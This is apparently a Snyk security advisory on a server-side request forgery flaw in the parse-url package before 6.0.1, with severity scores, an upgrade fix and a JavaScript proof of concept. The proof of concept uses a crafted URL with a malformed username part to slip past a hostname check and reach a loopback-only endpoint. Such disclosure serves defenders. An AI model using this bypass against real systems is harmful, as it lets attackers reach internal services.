Server-side Request Forgery (SSRF) Affecting org.webjars.npm:parse-url package, versions [,6.0.1)

Snyk CVSS

    Attack Complexity: Low
    Integrity: High
    Availability: High

    Threat Intelligence

    Exploit Maturity: Proof of concept
    EPSS: 0.19% (57th percentile)

NVD

9.8 critical

  • Snyk ID SNYK-JAVA-ORGWEBJARSNPM-2936250
  • published 28 Jun 2022
  • disclosed 28 Jun 2022
  • credit Pocas

How to fix?

Upgrade org.webjars.npm:parse-url to version 6.0.1 or higher.

Overview

org.webjars.npm:parse-url is an advanced URL parser that also supports git URLs.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, because hostnames are mishandled when a username and password are present in the URL. A hostname check built on parse-url's output can therefore disagree with the host that the HTTP client actually connects to.

PoC:

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

// Middleware that only lets requests arriving over the loopback interface reach /ssrf_check.
const isLocal = () => (req, res, next) => {
    const addr = req.connection.remoteAddress;
    return (addr === '::ffff:127.0.0.1' || addr === '::1')
        ? next()
        : res.json({ 'state': 'You\'re not locally' });
};

// Crafted URL with a userinfo part ("google:com:@"). The PoC relies on parse-url reporting a
// resource other than 127.0.0.1 for it, so the deny-list check below passes even though the
// request still reaches the local /ssrf_check endpoint.
const parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    // Deny-list check based on parse-url's view of the hostname.
    if (parsed.resource == '127.0.0.1') {
        res.send('Not good');
    } else {
        // Check passed: the outbound request is issued.
        http.get(parsed.href);
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) => {
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);